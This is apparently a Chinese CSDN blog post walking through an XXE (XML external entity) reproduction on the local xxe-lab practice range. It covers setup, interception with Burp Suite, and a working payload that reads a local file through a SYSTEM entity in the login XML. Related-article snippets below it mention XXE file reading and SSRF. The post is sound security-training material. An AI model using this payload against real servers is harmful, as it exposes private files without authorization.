XXE漏洞复现(基于xxe-lab靶场)

最新推荐文章于 2024-05-11 21:47:29 发布
最新推荐文章于 2024-05-11 21:47:29 发布
阅读量402 收藏 1
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73180072/article/details/133068384
版权

1、靶场搭建

phpstudy

window10

靶场源文件 https://github.com/c0ny1/xxe-lab

下载完毕后解压放置在phpstudy/www/目录下即可,访问  http://127.0.0.1/xxe-lab/php_xxe/(我这里解压后改了下文件夹名为xxe-lab,所以访问地址变了)

 2、漏洞复现

第一步  我们打开靶场输入 admin/123456 进行尝试登录,发现上方地址栏内未发生变化,判断登录页面为POST传参;

第二步 打开burpsuit,抓取数据包进行分析,判断此处可以提交xml格式的数据

第三步 下方输入payload,请求访问目录下的1.txt文件

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///D://phpstudy//PHPTutorial//WWW//1.txt">
]>
<user><username>&f;</username><password>admin888</password></user>

第四步 查看1.txt文件内容,与响应包内内容一致,漏洞复现成功。

如果对XXE漏洞原理需要详细了解,请查看之前的博客

XXE漏洞详解

http://t.csdn.cn/2npgi

TIME908
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
vulhub靶场学习日记xxe-lab
m0_55763479的博客
07-27 1094
vulhub靶场学习日记xxe-lab,主要练习XEE漏洞
边打XXE-lab边学习(一)
negnegil的博客
06-19 4637
一、简介及靶场搭建 简介 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 XXE原理 XXE即XML外部实体注入 。我们先分别理解一下注入和外部实体的含义。 注入:是指XML数据在传输过程中被修改,导致服务器执行了修改后的恶意代码,从而达到攻击目的。 外部实体:则是指攻击者通过利用外部实体声明部分来对XML数据进行修改、插入恶意代码。 所以XXE就是指XML数据在传输过程中利用外部实体声明部分的“SYSTEM
XXE-lab靶场搭建
最新发布
MateSnake的博客
05-11 308
XXE-lab靶场搭建
DTD学习一(入门)
Joy的专栏
04-04 575
一 简介 文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 二、实例 1、如果一个DTD被包含在XML源文件中,如使用如下test.xml: 文档定义语法: 元素定义语法: 2、如果是一个XML文件引用一个外部的DTD文件,如下实例: te
xxe-lab靶场安装和简单php代码审计
永远是少年
12-23 2912
今天继续给大家介绍渗透测试相关知识,本文主要内容是xxe-lab靶场安装和简单php代码审计。 一、xxe-lab靶场简介 二、php xxe-lab靶场安装 三、xxe-lab靶场PHP代码审计
xss-labs-master靶场环境搭建与1-6关解题思路
weixin_50985113的博客
07-01 654
1、靶场地址 2、小皮面板 3、windows机器 4、把压缩包解压,放在www目录下,然后访问即可 直接输入就行: 使用上面的弹窗语句,发现被转义了 拿出函数后,发现双引号已经被注释成 发现双引号被转义后,我们尝试使用单引号绕过,但是.........
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2253
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
在本节课程中,我们将基于这个测试代码来演示XXE漏洞的利用方法。 2. PHP中测试POC 在PHP中,XXE漏洞可以通过构建恶意XML文件来实现文件读取。下面是一个简单的POC(Proof of Concept)代码: ```php file:///...
CVE-2018-11788:Apache Karaf XXE漏洞(CVE-2018-11788)
03-18
在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXE(XML外部实体注入)漏洞。 导致解析器不正确地解析XML文档。受影响的版本Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6分析根据,Apache ...
xss-lab通关之路
黑白的博客
10-12 4325
xss-lab通关之路
WEB常见漏洞XXE靶场篇)
Javachichi的博客
11-10 488
其实在我们攻击具有XXE漏洞的服务器时,受攻击服务器进行了两次响应,如果查看受攻击的服务器上的日志会发现两条记录:一次是对XML进行解析后对另一台远程服务器的访问,一次是访问服务器自身上具有XXE漏洞的文件。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
XXE Lab渗透测试实战靶场
zhangpeng999123的博客
04-23 3079
任务描述:信息收集。 1. 首先查看kali机器IP地址: 10.1.1.91 2. 使用netdiscover扫描本地网络主机: # netdiscover -r 10.1.1.0/24 -r range:扫描给定范围而不是自动扫描。 3. 使用nmap扫描目标ip: # nmap -sV -p 1-65535 10.1.1.93 ...
WEB漏洞-XXE&XML之利用检测绕过
m0_65137829的博客
07-24 1412
XXE-"xml external entity injection" 服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
xxe-lab学习
win176489的博客
03-03 845
xxe-lab学习 xxe:xml外部实体注入,程序在解析xml文件时,引用了不安全的外部实体 环境如下 首先时回显的xxe,测试数据如下 POST /php_xxe/doLogin.php HTTP/1.1 Host: 10.10.6.168 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: application/xml, text/xml, */*; q=0.01 Acc
XXE攻防
LainWith的博客
08-24 627
目录前言什么是XXE脑图什么是XMLXML基本语法文档类型定义(DTD)实体XXE攻击分类检测XXE存在任意文件读取SSRF 攻击执行系统命令探测内网端口Blind XXE漏洞靶机实测Vulnhub搭建任意文件读取获取flag靶机实测XXE-lab防御方式使用开发语言提供的禁用外部实体的方法过滤用户提交的XML数据参考 前言 什么是XXE XXE(XML External Entity Injection)即XML外部实体注入,攻击者通过向服务器注入指定的XML实体内容,从而让服务器按照指定的配置进行执行,
pikachu靶场xxe漏洞
09-07
pikachu靶场xxe漏洞是指在该靶场中存在的XML外部实体攻击漏洞。通过构造恶意内容,攻击者可以利用这个漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。[1]这个靶场提供了一个接收XML数据的API,用于演示和学习xxe漏洞的原理、利用方法和思路。你可以在GitHub上找到该靶场的地址,并直接解压在www路径下进行使用。 在xxe漏洞的利用过程中,可以通过代码进行文件读取、内网探针或攻击内网应用、远程命令执行(RCE)、无回显读取文件等方式来实现攻击目标。同时也可以通过xxe绕过来绕过一些防御措施。 正常回显XXE是最传统的XXE攻击方式,服务器会直接回显信息,从而完成XXE攻击。而报错XXE是指在利用过程中会触发服务器的错误信息回显,进而获取敏感信息。所以,pikachu靶场xxe漏洞提供了一个学习和实践的平台,让人们能够更好地了解和防范xxe漏洞的危害。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值